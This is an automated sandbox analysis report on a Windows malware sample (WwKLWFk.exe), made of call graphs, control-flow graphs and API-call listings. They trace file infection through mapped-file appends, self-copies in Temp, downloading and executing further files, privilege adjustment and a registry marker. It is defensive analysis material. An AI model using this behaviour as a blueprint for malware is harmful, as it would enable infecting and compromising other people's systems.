CopyFileA 1116->1106 1120 b51a0d CreateFileA 1116->1120 1117->1108 1121 b51a59 ReadFile 1117->1121 1119->1070 1119->1074 1120->1106 1120->1115 1121->1108 1121->1117 1122->1119 1123->1116 1125 b52c09 WaitForMultipleObjects 1124->1125 1126 b52bc8 1124->1126 1127 b52c3c 1125->1127 1128 b52c2a CreateThread 1125->1128 1129 b52bfa lstrlen 1126->1129 1130 b52bd2 GetDriveTypeA 1126->1130 1131 b52be3 CreateThread 1126->1131 1128->1127 1135 b52845 1128->1135 1129->1125 1129->1126 1130->1126 1130->1129 1131->1129 1132 b52b7d 1131->1132 1146 b529e2 memset wsprintfA 1132->1146 1283 b5274a memset memset SHGetSpecialFolderPathA wsprintfA 1135->1283 1137 b52878 DeleteFileA 1138 b5288c VirtualFree 1137->1138 1139 b5289a 1137->1139 1138->1139 1142 b528a4 CloseHandle 1139->1142 1143 b528ab 1139->1143 1140 b52853 1140->1137 1141 b52692 8 API calls 1140->1141 1144 b52859 1140->1144 1141->1140 1142->1143 1145 b5239d 186 API calls 1144->1145 1145->1140 1147 b52abc memset memset FindFirstFileA 1146->1147 1148 b52a3a memset lstrlen lstrcpyn strrchr 1146->1148 1160 b528b8 memset wsprintfA 1147->1160 1148->1147 1150 b52a88 1148->1150 1150->1147 1151 b52a9a lstrcmpiA 1150->1151 1153 b52b74 1151->1153 1154 b52aad lstrlen 1151->1154 1154->1147 1154->1151 1155 b52b61 FindNextFileA 1156 b52b23 1155->1156 1157 b52b6d FindClose 1155->1157 1158 b52b35 lstrcmpiA 1156->1158 1159 b528b8 174 API calls 1156->1159 1157->1153 1158->1156 1158->1157 1159->1155 1161 b52905 1160->1161 1166 b52951 memset 1160->1166 1162 b52956 strrchr 1161->1162 1163 b5291b memset wsprintfA 1161->1163 1161->1166 1165 b52967 lstrcmpiA 1162->1165 1162->1166 1164 b529e2 180 API calls 1163->1164 1164->1166 1167 b52988 lstrcmpiA 1165->1167 1168 b5297a 1165->1168 1166->1155 1167->1166 1169 b52994 1167->1169 1178 b51e6e 1168->1178 1171 b529ad strstr 1169->1171 1172 b529a5 lstrcpy 1169->1172 1173 b529d3 1171->1173 1174 b529cb 1171->1174 1172->1171 1243 b52692 1173->1243 1221 b5239d strstr 1174->1221 1179 b51e7d 1178->1179 1252 b51df6 strrchr 1179->1252 1182 b51eb0 SetFileAttributesA CreateFileA 1183 b52332 1182->1183 1184 b51edf 1182->1184 1186 b52346 1183->1186 1187 b5233d UnmapViewOfFile 1183->1187 1257 b51915 1184->1257 1189 b52350 1186->1189 1190 b5234b CloseHandle 1186->1190 1187->1186 1191 b52356 CloseHandle 1189->1191 1192 b52391 1189->1192 1190->1189 1191->1192 1192->1166 1193 b51f2e 1193->1183 1263 b51c81 1193->1263 1197 b51f92 1198 b51c81 2 API calls 1197->1198 1199 b51f9f 1198->1199 1199->1183 1200 b52024 1199->1200 1201 b51af9 169 API calls 1199->1201 1200->1183 1202 b51af9 169 API calls 1200->1202 1205 b51fc0 1201->1205 1203 b5207a 1202->1203 1204 b51af9 169 API calls 1203->1204 1209 b52090 1204->1209 1205->1183 1205->1200 1206 b51af9 169 API calls 1205->1206 1207 b51ffe 1206->1207 1208 b52013 FlushViewOfFile 1207->1208 1208->1200 1210 b520bb memset memset 1209->1210 1211 b520f5 1210->1211 1212 b51c81 2 API calls 1211->1212 1214 b521de 1212->1214 1213 b52226 memcpy UnmapViewOfFile CloseHandle 1268 b51b8a 1213->1268 1214->1213 1216 b5226e 1276 b5185b GetSystemTimeAsFileTime srand rand srand rand 1216->1276 1218 b522ab SetFilePointer SetEndOfFile SetFilePointer WriteFile WriteFile 1219 b51915 3 API calls 1218->1219 1220 b5231f CloseHandle 1219->1220 1220->1183 1222 b52451 CreateFileA GetFileSize 1221->1222 1229 b523d8 1221->1229 1223 b52675 CloseHandle 1222->1223 1224 b52480 1222->1224 1225 b5267c RemoveDirectoryA 1223->1225 1224->1223 1226 b52499 1224->1226 1227 b52687 1225->1227 1228 b51915 3 API calls 1226->1228 1227->1166 1230 b524a4 9 API calls 1228->1230 1229->1222 1229->1227 1278 b5189d memset CreateProcessA 1230->1278 1233 b5255c Sleep memset wsprintfA 1234 b529e2 163 API calls 1233->1234 1235 b52597 memset wsprintfA Sleep 1234->1235 1236 b5189d 6 API calls 1235->1236 1237 b525e4 Sleep CreateFileA 1236->1237 1238 b51915 3 API calls 1237->1238 1239 b52610 CloseHandle 1238->1239 1239->1225 1240 b5261e 1239->1240 1240->1225 1241 b52641 SetFilePointer WriteFile 1240->1241 1241->1225 1242 b52667 SetEndOfFile 1241->1242 1242->1225 1244 b526b2 WaitForSingleObject 1243->1244 1245 b526a2 CreateEventA 1243->1245 1246 b526c1 lstrlen ??2@YAPAXI 1244->1246 1247 b52708 1244->1247 1245->1244 1248 b52736 SetEvent 1246->1248 1249 b526da lstrcpy 1246->1249 1247->1248 1250 b52718 lstrcpy ??3@YAXPAX 1247->1250 1248->1166 1251 b526f1 1249->1251 1250->1251 1251->1248 1253 b51e13 lstrcpy strrchr 1252->1253 1256 b51e62 1252->1256 1254 b51e40 lstrcmpiA 1253->1254 1253->1256 1255 b51e52 lstrlen 1254->1255 1254->1256 1255->1254 1255->1256 1256->1182 1256->1183 1258 b51924 SetFilePointer CreateFileMappingA MapViewOfFile 1257->1258 1259 b51928 1257->1259 1258->1183 1258->1193 1260 b5194f 1259->1260 1261 b5192e memset GetFileTime 1259->1261 1260->1258 1262 b51954 SetFileTime 1260->1262 1261->1258 1262->1258 1264 b51c9c 1263->1264 1266 b51c94 1263->1266 1265 b51cae memset memset 1264->1265 1264->1266 1265->1266 1266->1183 1267 b5185b GetSystemTimeAsFileTime srand rand srand rand 1266->1267 1267->1197 1270 b51b93 1268->1270 1277 b5185b GetSystemTimeAsFileTime srand rand srand rand 1270->1277 1271 b51bca srand 1272 b51bd8 rand 1271->1272 1273 b51c08 1272->1273 1273->1272 1274 b51c29 memset memcpy lstrcat 1273->1274 1274->1216 1276->1218 1277->1271 1279 b518e0 CloseHandle WaitForSingleObject 1278->1279 1280 b5190c 1278->1280 1281 b51907 CloseHandle 1279->1281 1282 b518fb GetExitCodeProcess 1279->1282 1280->1225 1280->1233 1281->1280 1282->1281 1292 b5185b GetSystemTimeAsFileTime srand rand srand rand 1283->1292 1285 b527b5 wsprintfA CopyFileA 1286 b52840 1285->1286 1287 b527de wsprintfA 1285->1287 1286->1140 1288 b51973 17 API calls 1287->1288 1289 b5280f 1288->1289 1290 b52820 CreateFileA 1289->1290 1291 b52813 DeleteFileA 1289->1291 1290->1286 1291->1290 1292->1285 1293->1077 1295 b511c6 AdjustTokenPrivileges 1294->1295 1296 b51200 CloseHandle 1294->1296 1297 b511f7 CloseHandle 1295->1297 1298 b511f6 1295->1298 1296->1085 1297->1296 1298->1297 1300 b51310 1299->1300 1301 b5123f GetCurrentProcessId OpenProcess 1299->1301 1300->1083 1308 b51319 1300->1308 1301->1300 1305 b51262 1301->1305 1302 b512b0 VirtualAlloc 1302->1305 1306 b512b8 1302->1306 1303 b512f1 CloseHandle 1303->1300 1304 b51302 VirtualFree 1303->1304 1304->1300 1305->1302 1305->1303 1305->1306 1307 b51296 VirtualFree 1305->1307 1306->1303 1307->1302 1309 b5134a 1308->1309 1310 b5132a GetModuleHandleA GetProcAddress 1308->1310 1311 b51351 memset 1309->1311 1312 b51363 1309->1312 1310->1309 1310->1312 1311->1312 1312->1083 1312->1091 1314 b510ba 1313->1314 1315 b51196 1313->1315 1314->1315 1331 b5185b GetSystemTimeAsFileTime srand rand srand rand 1314->1331 1317 b51118 wsprintfA wsprintfA URLDownloadToFileA 1318 b510dc 1317->1318 1319 b51168 lstrlen Sleep 1317->1319 1322 b51000 CreateFileA 1318->1322 1319->1314 1323 b51025 GetFileSize CreateFileMappingA MapViewOfFile 1322->1323 1324 b51092 WinExec lstrlen 1322->1324 1325 b51057 1323->1325 1326 b5107b 1323->1326 1324->1314 1324->1315 1327 b51074 UnmapViewOfFile 1325->1327 1330 b51061 1325->1330 1328 b51087 CloseHandle 1326->1328 1329 b5108d CloseHandle 1326->1329 1327->1326 1328->1329 1329->1324 1330->1327 1331->1317 1338 b52361 1339 b52374 1338->1339 1340 b5236b UnmapViewOfFile 1338->1340 1341 b52382 1339->1341 1342 b52379 CloseHandle 1339->1342 1340->1339 1343 b52388 CloseHandle 1341->1343 1344 b52391 1341->1344 1342->1341 1343->1344 1345 b56159 VirtualFree 1353 b560c7 1345->1353 1346 b56198 VirtualFree 1355 b561b2 1346->1355 1347 b560d5 VirtualAlloc 1347->1353 1348 b56389 VirtualProtect 1352 b563b7 1348->1352 1349 b563fc VirtualProtect 1350 b56400 1349->1350 1351 b5615f VirtualFree 1351->1353 1352->1349 1354 b563e7 VirtualProtect 1352->1354 1353->1346 1353->1347 1353->1351 1354->1349 1354->1352 1355->1348 1356 b562fb 1355->1356

                                    Callgraph

                                    • Executed
                                    • Not Executed
                                    • Opacity -> Relevance
                                    • Disassembly available
                                    callgraph 0 Function_00B56734 19 Function_00B56A84 0->19 24 Function_00B56D00 0->24 25 Function_00B56B02 0->25 1 Function_00B56834 2 Function_00B569B0 3 Function_00B528B8 9 Function_00B52692 3->9 11 Function_00B5239D 3->11 44 Function_00B529E2 3->44 45 Function_00B51E6E 3->45 4 Function_00B51638 14 Function_00B5139F 4->14 15 Function_00B51099 4->15 17 Function_00B51718 4->17 20 Function_00B51581 4->20 47 Function_00B517D0 4->47 52 Function_00B52C48 4->52 5 Function_00B567A4 6 Function_00B565A6 7 Function_00B51915 8 Function_00B56014 10 Function_00B56012 11->7 12 Function_00B5189D 11->12 11->44 13 Function_00B5119F 14->13 16 Function_00B51319 14->16 28 Function_00B5120E 14->28 23 Function_00B51000 15->23 50 Function_00B5185B 15->50 34 Function_00B52CF0 17->34 18 Function_00B52D9B 27 Function_00B5680F 19->27 36 Function_00B56CF2 19->36 20->50 21 Function_00B56001 29 Function_00B5600A 21->29 22 Function_00B51C81 23->47 24->2 24->36 43 Function_00B56B63 24->43 25->43 26 Function_00B52B8C 37 Function_00B52B7D 26->37 51 Function_00B52845 26->51 30 Function_00B51B8A 30->50 31 Function_00B51D8A 32 Function_00B56076 53 Function_00B566C8 32->53 33 Function_00B51DF6 35 Function_00B51973 35->50 39 Function_00B56CF8 36->39 37->44 38 Function_00B51AF9 38->4 40 Function_00B514E1 40->4 40->38 41 Function_00B52361 41->18 42 Function_00B52D60 43->1 43->2 43->5 44->3 45->7 45->18 45->22 45->30 45->31 45->33 45->38 45->42 46 Function_00B51C68 45->46 45->50 48 Function_00B5235D 49 Function_00B56159 49->53 51->9 51->11 54 Function_00B5274A 51->54 52->26 52->35 53->19 53->24 53->25 54->35 54->50

                                    Control-flow Graph

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.1648135376.0000000000B51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B50000, based on PE: true
                                    • Associated: 00000016.00000002.1648115372.0000000000B50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648177006.0000000000B53000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648526944.0000000000B54000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648575700.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_b50000_WwKLWFk.jbxd
                                    Similarity
                                    • API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
                                    • String ID: %s*$C:\$Documents and Settings
                                    • API String ID: 2826467728-110786608
                                    • Opcode ID: 3987b18cab2624a4059152f6a4c60332a2849c2c2861283ff6aff073ba4fde99
                                    • Instruction ID: 2dbfc4fa9aad6c81e8a4779b8bb0a7611b1ec4670bdb4df708e707af61fb93e9
                                    • Opcode Fuzzy Hash: 3987b18cab2624a4059152f6a4c60332a2849c2c2861283ff6aff073ba4fde99
                                    • Instruction Fuzzy Hash: 314181B2405349AFD721EBA0DC89FDB77ECEB85746F0408A9F944C3151EA30D64C8BA2

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 231 b51718-b51733 GetSystemTimeAsFileTime 232 b51735-b51752 SHSetValueA 231->232 233 b51754-b51758 231->233 234 b517c6-b517cd 232->234 233->234 235 b5175a-b51784 SHGetValueA 233->235 235->234 236 b51786-b517b3 call b52cf0 * 2 235->236 236->234 241 b517b5 236->241 242 b517b7-b517bd 241->242 243 b517bf 241->243 242->234 242->243 243->234
                                    APIs
                                    • GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\WwKLWFk.exe), ref: 00B51729
                                    • SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 00B5174C
                                    • SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 00B5177C
                                    • __aulldiv.LIBCMT ref: 00B51796
                                    • __aulldiv.LIBCMT ref: 00B517A8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.1648135376.0000000000B51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B50000, based on PE: true
                                    • Associated: 00000016.00000002.1648115372.0000000000B50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648177006.0000000000B53000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648526944.0000000000B54000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648575700.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_b50000_WwKLWFk.jbxd
                                    Similarity
                                    • API ID: TimeValue__aulldiv$FileSystem
                                    • String ID: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe$SOFTWARE\GTplus$Time
                                    • API String ID: 541852442-923351284
                                    • Opcode ID: 1f2d8708c3f2d9981c56fab86f20403ec05992cc0371fa71af6658b31862be0d
                                    • Instruction ID: 604c5e099507b478afc65bae4e13ff9a2a4f2b03fee879bd162025add7daf2a4
                                    • Opcode Fuzzy Hash: 1f2d8708c3f2d9981c56fab86f20403ec05992cc0371fa71af6658b31862be0d
                                    • Instruction Fuzzy Hash: A31151B1A00209BBDB109BA8C885FAE7BF8EB44B56F1085D5FD01B6281D6719E48CB64

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 244 b56076-b56079 245 b560e0-b560eb 244->245 246 b5607b-b56080 244->246 249 b560ee-b560f4 245->249 247 b560f7-b560f8 246->247 248 b56082-b56085 246->248 252 b560fe-b56106 247->252 253 b560fa-b560fc call b566c8 247->253 250 b56087 248->250 251 b560f6 248->251 249->251 250->249 256 b56089-b56095 250->256 251->247 254 b56155-b56189 VirtualFree 252->254 255 b56108-b5611d 252->255 253->252 266 b5618c-b56192 254->266 258 b5611f-b56121 255->258 259 b56097-b5609f 256->259 260 b560a1-b560aa 256->260 262 b56151-b56154 258->262 263 b56123 258->263 259->260 264 b560b0-b560c1 VirtualAlloc 260->264 265 b561ba-b561c8 260->265 262->254 263->262 269 b56125-b56128 263->269 270 b560c7-b560cf 264->270 267 b56243-b56251 265->267 268 b561ca-b561d7 265->268 266->270 271 b56198-b561b0 VirtualFree 266->271 276 b56264-b5626f 267->276 277 b56253 267->277 272 b561dd-b561e0 268->272 273 b56134-b5613b 269->273 274 b5612a-b5612e 269->274 270->266 275 b560d5-b560df VirtualAlloc 270->275 271->265 278 b561b2-b561b4 271->278 272->267 280 b561e2-b561f2 272->280 288 b56130-b56132 273->288 289 b5613d-b5614f 273->289 274->273 274->288 275->245 279 b56271-b56276 276->279 283 b56255-b56258 277->283 278->265 285 b5627c-b56289 279->285 286 b56389-b563b1 VirtualProtect 279->286 287 b561f5-b561fe 280->287 283->276 284 b5625a-b56262 283->284 284->283 300 b56292-b56298 285->300 301 b5628b 285->301 292 b563b7-b563ba 286->292 290 b56200-b56203 287->290 291 b5620c-b56219 287->291 288->258 289->258 294 b56205-b56208 290->294 295 b5621b-b56228 290->295 296 b56238-b5623f 291->296 297 b563fc-b563ff VirtualProtect 292->297 298 b563bc-b563c2 292->298 302 b5622a-b56236 294->302 303 b5620a 294->303 295->296 296->287 305 b56241 296->305 299 b56400-b56416 297->299 298->298 304 b563c4 298->304 306 b56420-b56425 299->306 307 b56418-b5641d 299->307 308 b562a2-b562ac 300->308 301->300 302->296 303->296 304->297 309 b563c6-b563cf 304->309 305->272 310 b562b1-b562c8 308->310 311 b562ae 308->311 312 b563d4-b563d8 309->312 313 b563d1 309->313 314 b56373-b56384 310->314 315 b562ce-b562d4 310->315 311->310 316 b563dd-b563e1 312->316 317 b563da 312->317 313->312 314->279 320 b562d6-b562d9 315->320 321 b562da-b562f1 315->321 318 b563e7-b563fa VirtualProtect 316->318 319 b563e3 316->319 317->316 318->292 318->297 319->318 320->321 323 b56365-b5636e 321->323 324 b562f3-b562f9 321->324 323->308 325 b56314-b56326 324->325 326 b562fb-b5630f 324->326 328 b5634c-b56360 325->328 329 b56328-b5634a 325->329 327 b56426-b564a9 326->327 338 b56519-b5651c 327->338 339 b564ab-b564c0 327->339 328->327 329->323 340 b56583-b56587 338->340 341 b5651d-b5651e 338->341 345 b56535-b56537 339->345 346 b564c2 339->346 343 b56588-b5658b 340->343 344 b56522-b56533 341->344 347 b565a1-b565a3 343->347 348 b5658d-b5658f 343->348 344->345 349 b56539 345->349 350 b5659a 345->350 351 b564c5-b564cd 346->351 352 b564f8 346->352 353 b56591-b56593 348->353 354 b565b4 349->354 355 b5653b-b56541 349->355 356 b5659b-b5659d 350->356 357 b56542-b56545 351->357 358 b564cf-b564d4 351->358 359 b5656c-b5656f 352->359 360 b564fa-b564fe 352->360 353->356 361 b56595 353->361 366 b565be-b56608 354->366 355->357 356->353 362 b5659f 356->362 363 b5654d-b56550 357->363 364 b56517-b56518 358->364 365 b564d6-b564d9 358->365 367 b56572 359->367 360->367 368 b56500 360->368 361->350 362->343 363->366 372 b56552-b56556 363->372 364->338 365->363 373 b564db-b564f5 365->373 369 b56573-b56576 367->369 368->344 370 b56502 368->370 374 b56578-b5657f 369->374 370->369 375 b56504-b56513 370->375 372->374 376 b56558-b56569 372->376 373->352 374->340 375->345 378 b56515 375->378 376->359 378->364
                                    APIs
                                    • VirtualAlloc.KERNELBASE(00000000,00001800,00001000,00000004), ref: 00B560BE
                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,?,?,?), ref: 00B560DF
                                    • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00B56189
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00B561A5
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.1648575700.0000000000B56000.00000040.00000001.01000000.00000004.sdmp, Offset: 00B50000, based on PE: true
                                    • Associated: 00000016.00000002.1648115372.0000000000B50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648135376.0000000000B51000.00000020.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648177006.0000000000B53000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648526944.0000000000B54000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_b50000_WwKLWFk.jbxd
                                    Similarity
                                    • API ID: Virtual$AllocFree
                                    • String ID:
                                    • API String ID: 2087232378-0
                                    • Opcode ID: f358f1d0664c73a22a1f60fea8056d02ed66a49ec2b197f469e73eb5277bd738
                                    • Instruction ID: 9ac0ae5fddcb5060cc7fb50cdd0c613f79f7aabb0e87873c6581e8ec1af0738d
                                    • Opcode Fuzzy Hash: f358f1d0664c73a22a1f60fea8056d02ed66a49ec2b197f469e73eb5277bd738
                                    • Instruction Fuzzy Hash: AE1247B25087848FDB328F24CC85BEA7BF0EF12311F9845DDDD858B292D674A909CB55

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 16 b51e6e-b51e95 call b52d60 19 b51e97 call b51d8a 16->19 20 b51e9c-b51eaa call b51df6 16->20 19->20 24 b51eb0-b51ed9 SetFileAttributesA CreateFileA 20->24 25 b52332 20->25 24->25 26 b51edf-b51f28 call b51915 SetFilePointer CreateFileMappingA MapViewOfFile 24->26 27 b52338-b5233b 25->27 26->25 34 b51f2e-b51f39 26->34 29 b52346-b52349 27->29 30 b5233d-b52340 UnmapViewOfFile 27->30 32 b52350-b52354 29->32 33 b5234b-b5234e CloseHandle 29->33 30->29 35 b52356-b5235b CloseHandle 32->35 36 b52391-b5239a call b52d9b 32->36 33->32 34->25 38 b51f3f-b51f56 34->38 35->36 38->25 40 b51f5c-b51f64 38->40 40->25 41 b51f6a-b51f70 40->41 41->25 42 b51f76-b51f87 call b51c81 41->42 42->25 45 b51f8d-b51fa7 call b5185b call b51c81 42->45 45->25 50 b51fad-b51fb4 45->50 51 b52024-b52045 50->51 52 b51fb6-b51fc5 call b51af9 50->52 51->25 53 b5204b-b5204e 51->53 52->51 60 b51fc7-b51fd2 52->60 55 b52070-b520f4 call b51af9 * 2 call b51c68 * 2 memset * 2 53->55 56 b52050-b52053 53->56 78 b520f5-b520fe 55->78 58 b52056-b5205a 56->58 58->55 61 b5205c-b52061 58->61 60->25 63 b51fd8-b51fe7 60->63 61->25 64 b52067-b5206e 61->64 66 b51fef-b52006 call b51af9 63->66 67 b51fe9-b51fec 63->67 64->58 73 b52013-b5201e FlushViewOfFile 66->73 74 b52008-b5200e call b51c68 66->74 67->66 73->51 74->73 79 b52130-b52139 78->79 80 b52100-b52114 78->80 83 b5213c-b52142 79->83 81 b52116-b5212a 80->81 82 b5212d-b5212e 80->82 81->82 82->78 84 b52144-b52150 83->84 85 b5215c 83->85 86 b52157-b5215a 84->86 87 b52152-b52154 84->87 88 b5215f-b52162 85->88 86->83 87->86 89 b52164-b52171 88->89 90 b52181-b52184 88->90 91 b52177-b5217e 89->91 92 b5232a-b5232d 89->92 93 b52186 90->93 94 b5218d-b521ba call b51c68 90->94 91->90 92->88 93->94 97 b521d3-b5220b call b51c81 call b51c68 94->97 98 b521bc-b521d0 call b51c68 94->98 105 b5220d-b52218 call b51c68 97->105 106 b5221b-b5221e 97->106 98->97 105->106 108 b52226-b52328 memcpy UnmapViewOfFile CloseHandle call b51b8a call b5185b SetFilePointer SetEndOfFile SetFilePointer WriteFile * 2 call b51915 CloseHandle 106->108 109 b52220-b52223 106->109 108->27 109->108
                                    APIs
                                    • SetFileAttributesA.KERNELBASE(00B52597,00000080,00B52597,00B532B0,00000164,00B52986,?), ref: 00B51EB9
                                    • CreateFileA.KERNELBASE(00B52597,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00B51ECD
                                    • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 00B51EF3
                                    • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 00B51F07
                                    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000400), ref: 00B51F1D
                                    • FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 00B5201E
                                    • memset.MSVCRT ref: 00B520D8
                                    • memset.MSVCRT ref: 00B520EA
                                    • memcpy.MSVCRT ref: 00B5222D
                                    • UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00B52238
                                    • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00B5224A
                                    • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00B522C6
                                    • SetEndOfFile.KERNEL32(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00B522CB
                                    • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00B522DD
                                    • WriteFile.KERNEL32(000000FF,00B54008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00B522F7
                                    • WriteFile.KERNEL32(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00B5230D
                                    • CloseHandle.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00B52322
                                    • UnmapViewOfFile.KERNEL32(?,00B52597,00B532B0,00000164,00B52986,?), ref: 00B52340
                                    • CloseHandle.KERNEL32(?,00B52597,00B532B0,00000164,00B52986,?), ref: 00B5234E
                                    • CloseHandle.KERNEL32(000000FF,00B52597,00B532B0,00000164,00B52986,?), ref: 00B52359
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.1648135376.0000000000B51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B50000, based on PE: true
                                    • Associated: 00000016.00000002.1648115372.0000000000B50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648177006.0000000000B53000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648526944.0000000000B54000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648575700.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_b50000_WwKLWFk.jbxd
                                    Similarity
                                    • API ID: File$CloseHandleView$Pointer$CreateUnmapWritememset$AttributesFlushMappingmemcpy
                                    • String ID:
                                    • API String ID: 3043204753-0
                                    • Opcode ID: 38e991154d1d595e3848a9e6f2c580a1a2b81ae6db016a6a57c6578706798bef
                                    • Instruction ID: f95369e1c70144859f6a264915255c42713951d84a0588712fdfd3127a96f7f6
                                    • Opcode Fuzzy Hash: 38e991154d1d595e3848a9e6f2c580a1a2b81ae6db016a6a57c6578706798bef
                                    • Instruction Fuzzy Hash: 10F15871901208EFCB20DFA8D881BADBBF5FF09316F1045A9E909A72A1D730AD85CF54

                                    Control-flow Graph

                                    APIs
                                    • memset.MSVCRT ref: 00B52766
                                    • memset.MSVCRT ref: 00B52774
                                    • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 00B52787
                                    • wsprintfA.USER32 ref: 00B527AB
                                      • Part of subcall function 00B5185B: GetSystemTimeAsFileTime.KERNEL32(?,?,77068400,00000000,?,?,?,00B527B5), ref: 00B51867
                                      • Part of subcall function 00B5185B: srand.MSVCRT ref: 00B51878
                                      • Part of subcall function 00B5185B: rand.MSVCRT ref: 00B51880
                                      • Part of subcall function 00B5185B: srand.MSVCRT ref: 00B51890
                                      • Part of subcall function 00B5185B: rand.MSVCRT ref: 00B51894
                                    • wsprintfA.USER32 ref: 00B527C6
                                    • CopyFileA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\50ed6d56.exe,00000000), ref: 00B527D4
                                    • wsprintfA.USER32 ref: 00B527F4
                                      • Part of subcall function 00B51973: PathFileExistsA.KERNELBASE(00B54E54,77068400,00000000), ref: 00B51992
                                      • Part of subcall function 00B51973: CreateFileA.KERNELBASE(00B54E54,80000000,00000001,00000000,00000003,00000000,00000000,C:\Users\user\AppData\Local\Temp\50ed6d56.exe), ref: 00B519BA
                                      • Part of subcall function 00B51973: Sleep.KERNEL32(00000064), ref: 00B519C6
                                      • Part of subcall function 00B51973: wsprintfA.USER32 ref: 00B519EC
                                      • Part of subcall function 00B51973: CopyFileA.KERNEL32(00B54E54,?,00000000), ref: 00B51A00
                                      • Part of subcall function 00B51973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B51A1E
                                      • Part of subcall function 00B51973: GetFileSize.KERNEL32(00B54E54,00000000), ref: 00B51A2C
                                      • Part of subcall function 00B51973: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 00B51A46
                                      • Part of subcall function 00B51973: ReadFile.KERNELBASE(00B54E54,00B54E58,00000000,?,00000000), ref: 00B51A65
                                    • DeleteFileA.KERNEL32(?,?,00B54E54,00B54E58), ref: 00B5281A
                                    • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,00B54E54,00B54E58), ref: 00B52832
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.1648135376.0000000000B51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B50000, based on PE: true
                                    • Associated: 00000016.00000002.1648115372.0000000000B50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648177006.0000000000B53000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648526944.0000000000B54000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000016.00000002.1648575700.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_22_2_b50000_WwKLWFk.jbxd
                                    Similarity
                                    • API ID: File$wsprintf$Create$CopyPathTimememsetrandsrand$AllocDeleteExistsFolderReadSizeSleepSpecialSystemVirtual
                                    • String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\50ed6d56.exe$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
                                    • API String ID: 692489704-4029383994
                                    • Opcode ID: 758f1645c6d9e930e2fbb713a21255efb752cec19bacd27d69169bc3326293a1
